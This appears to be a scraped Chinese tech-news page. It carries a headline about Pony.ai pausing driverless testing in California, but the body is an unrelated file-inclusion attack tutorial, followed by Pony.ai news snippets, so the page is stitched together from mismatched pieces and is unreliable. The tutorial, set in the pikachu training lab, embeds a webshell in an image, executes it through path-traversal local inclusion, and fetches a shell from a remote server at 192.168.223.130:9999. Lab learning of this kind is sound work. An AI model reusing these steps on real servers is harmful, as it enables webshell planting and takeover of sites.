2. 程式人生 > 資訊 >小馬智行 (Pony.ai) 主動暫停加州全無人駕駛汽車測試

小馬智行 (Pony.ai) 主動暫停加州全無人駕駛汽車測試

阿新 發佈:2021-12-13
檔案包含 概念 把可以重複使用的函式寫入單個檔案中,在使用該函式時,直接呼叫此檔案,無需再次編寫函式,這呼叫檔案的過程稱為包含 漏洞原理 大多數情況下,檔案包含函式中包含的程式碼檔案是固定的,因此也不會出現安全問題。 但是,有些時候,檔案包含的程式碼檔案被寫成了一個變數,且這個變數可以由前端使用者傳進來,這種情況下,如果沒有做足夠的安全考慮,則可能會引發檔案包含漏洞。 攻擊著會指定一個“意想不到”的檔案讓包含函式去執行,從而造成惡意操作 防禦 在web應用系統的功能設計上儘量不要讓前端使用者直接傳變數給包含函式,如果非要這麼做,也一定要做嚴格的白名單策略進行過濾 漏洞型別 一、本地檔案包含漏洞
 僅能夠對伺服器本地的檔案進行包含,由於伺服器上的檔案並不是攻擊者所能夠控制的,因此該情況下,攻擊著更多的會包含一些 固定的系統配置檔案,從而讀取系統敏感資訊。很多時候本地檔案包含漏洞會結合一些特殊的檔案上傳漏洞,從而形成更大的威力。 以pikachu靶場為例,通過白盒的方式進行展示 1.首先將一句話木馬和一個普通的檔案結合起來(一句話木馬通過txt或者php儲存都不影響) copy /a 1.jpg + /b test.php = muma.jpg 2.上傳到Unsafe Fileupload的getimagesize中,獲取儲存路徑為uploads/24931561b9d4c42c4f0082985216.jpg
 PS:如果出現報錯,發現是時間的問題,可以到靶場配置檔案getimagesize.php下修改儲存路徑為$save_path='uploads/' 3.找到本地下包含木馬的jpg檔案位置為vul/unsafeupload/uploads/24931561b9d4c42c4f0082985216.jpg,然後到File Inclusion下的local,隨便點選一個圖片,獲取儲存地址為vul/fileinclude/fi_local.php?filename=file1.php&submit=提交查詢 4.通過本地找到該圖片的位置為vul/fileinclude/include 下,觀察3中的url位置,修改filename到含有木馬的檔案下,完成執行
 vul/fileinclude/fi_local.php?filename=../../unsafeupload/uploads/24931561b9d4c42c4f0082985216.jpg&submit=提交查詢 PS:該url可以通過蟻劍建立連線 二、遠端檔案包含漏洞 能夠通過url地址對遠端的檔案進行包含,這意味著攻擊者可以傳入任意的程式碼 準備:1.開啟配置檔案,修改php.ini檔案的allow_url_include = Off 改成 On 2.開啟一個伺服器:python3 -m http.server 9999 並將一句話木馬上傳到伺服器下 1.首先在伺服器上編寫一句話木馬,儲存檔案為1.txt 2.找到伺服器上木馬的位置為http://192.168.223.130:9999/1.txt 3.在pikachu的File Inclusion的remote中,點開圖片後,修改url的filename為木馬位置,完成執行 vul/fileinclude/fi_remote.php?filename=http://192.168.223.130:9999/1.txt&submit=submit=提交查詢

相關推薦

(Pony.ai) 主動暫停加州無人駕駛汽車測試

12 月 13 日早間訊息,加州交管局 (DMV) 的全無人自動駕駛道路測試牌照名單裡面沒有了小馬智行 (Pony.ai) 的名字,這家自動駕駛行業頭部廠商發生了什麼?在加州交管局官網的全無人自動駕駛測試牌照 (Driverless Test

Pony.ai 獲批在加州測試無人駕駛汽車

根據外媒報道,美國東部時間 5 月 22 日下午,中國機器人公司Pony.ai)已獲得加州監管機構的許可,在三個城市指定的街道上測試無人駕駛汽車

公開下一代 L4 車規級自動駕駛系統設計,豐田首批搭載

1 月 20 日訊息,據小馬智行官方訊息,1 月 20 日,小馬智行首度公開第六代面向 L4 車規級量產設計的自動駕駛軟硬體系統外型設計、感測器及計算平臺方案。第一批搭載該系統的車型為豐田 S-AM(SIENNA Autono-MaaS)

第一批自動駕駛車批量下線

2月9日訊息今日,小馬智行Pony.ai)宣佈首批搭載其最新一代系統的自動駕駛汽車從標準化產線正式下線,即將在廣州、北京、上海開啟全天候的自動駕駛公開道路測試,並加入公司 Robotaxi 車隊投入規模化運營。

釋出一體式自動駕駛系統,搭載 Luminar 鐳射雷達

5 月 11 日訊息 昨日,與鐳射雷達企業 Luminar 聯合釋出全新自動駕駛系統。該系統使用 360 度全方位多感測器融合方案。

自動駕駛創企:正式獲得貨運道路運輸經營許可證

5 月 12 日訊息 昨日,宣佈旗下智慧物流公司已於今年 4 月 21 日正式獲得廣州市南沙區交通運輸局頒發的貨運道路運輸經營許可證,並已開展商業運營。

訊息稱開始造車,已在上海設立團隊

6 月 11 日訊息 據 36 氪報道,從多個知情人士處獲悉,自動駕駛公司(即 Pony.ai)已加入造車大軍,目前在上海嘉定設立了十餘人的整車團隊。

網傳自動駕駛提供商“”將下場造車,官方迴應:不實訊息

6 月 24 日午間訊息,今日,自動駕駛獨角獸小馬智行通過新浪科技迴應了近期市場傳言公司將參與造車的傳聞,小馬智行官方表示:“關於最近小馬智行造車傳言均為不實資訊,我們正在持續穩步地進行智慧駕駛產品化和商業

聘請摩根大通高管為首任 CFO,或為 IPO 做準備

北京時間 6 月 25 日晚間訊息,據報道,自動駕駛汽車初創公司今日宣佈,已聘請摩根大通投資銀行副董事長勞倫斯・斯泰恩(Lawrence Steyn)擔任公司首任首席財務官(CFO)。

宣佈自動駕駛出行服務 Robotaxi 正式在上海開啟:採用雷克薩斯 RX 車型

7 月 8 日訊息昨日在上海世界人工智慧大會上展示了最新自研自動駕駛技術,同時宣佈自動駕駛出行服務(Robotaxi)正式在上海開啟。

訊息稱暫緩通過 SPAC 赴美上市計劃

8 月 12 日早間訊息,據報道,知情人士透露,自動駕駛初創公司Pony.ai)已經暫緩了通過 SPAC 以 120 億美元估值赴美上市的計劃。

主駕位無安全員,獲准在北京開啟自動駕駛無人化測試

10 月 15 日訊息,今日,小馬智行宣佈獲頒“北京市智慧網聯汽車政策先行區”首批無人化道路測試許可,正式在北京開啟“主駕位無安全員”的自動駕駛無人化測試小馬智行表示,今年以來,小馬智行獲得加州、廣州、北

確認“卡車自動駕駛部門調整”,並稱將整合研發資源,打造“虛擬司機”

11 月 9 日午間訊息,報道稱自動駕駛公司小馬智行在經歷上市融資計劃遇阻擱置後,目前已將卡車自動駕駛研發團隊併入乘用車研發團隊,重新考慮公司資源分配。今日,小馬智行在迴應媒體時確認了此事,並確認稱公司將整

迴應“造車計劃停滯”:無造車計劃

11 月 17 日訊息,此前,36 氪報道稱,小馬智行的乘用車“造車”計劃目前趨於停滯,位於上海嘉定的十餘人造車團隊也將面臨調整。一位知情人士表示,該團隊部分成員已經離開,加盟其他新造車勢力公司。對此,小馬智行

與如祺出行達成合作:推動自動駕駛技術商業化落地

11 月 21 日訊息,據 Pony.ai 小馬智行公眾號,小馬智行宣佈與如祺出行達成合作,共同推動自動駕駛技術商業化落地。據介紹,在廣州車展期間,小馬智行和如祺出行展示了 L4 自動駕駛技術最新應用成果,搭載了小馬智行

卡完成國內自動駕駛卡車公開高速路首測

12 月 7 日訊息,昨日,小馬智行宣佈,小馬智卡自動駕駛卡車 12 月 5 日順利駛入京臺高速公路,開啟常態化自動駕駛測試小馬智行表示,這是全國範圍內自動駕駛企業首次在政策開放的公開高速公路進行高級別自動駕駛

自動駕駛車輛深圳開跑

12 月 11 日訊息,小馬智行於 12 月 8 日獲頒深圳市智慧網聯汽車道路測試牌照。取得牌照後,小馬智行自動駕駛車隊隨即開啟在深圳市公開道路的道路測試及技術驗證。▲ 圖源:小馬智行小馬智行表示,隨後公司會持續推

宣佈與一汽(南京)達成戰略合作,推進 L4 級自動駕駛技術應用落地

12 月 24 日訊息,今日小馬智行宣佈與戰略投資方中國一汽的全資子公司一汽(南京)科技開發有限公司達成戰略合作,深度整合雙方在 L4 級自動駕駛技術研發、整車研發製造等領域的資源及優勢,加速自動駕駛出行服務(

推出自研車規級計算單元:搭載英偉達 DRIVE Orin 系統級晶片,2022 年底開始量產

1 月 22 日訊息,小馬智行本週宣佈推出自研車規級計算單元方案,搭載英偉達 DRIVE Orin(SoC)系統級晶片。小馬智行表示,已開始使用英偉達 DRIVE Orin 進行路測,軟體系統已能夠在 Orin 上低時延實時運轉。全新計算

宣佈完成 D 輪融資首次交割,估值達 85 億美元

3 月 7 日訊息,今日,小馬智行宣佈完成 D 輪融資的首次交割,整體估值達 85 億美元(約 538.9 億元人民幣)。本輪估值較上輪融資提升約 65%。獲悉,小馬智行表示,本輪融資資金將用於團隊擴充、技術研發、Robotaxi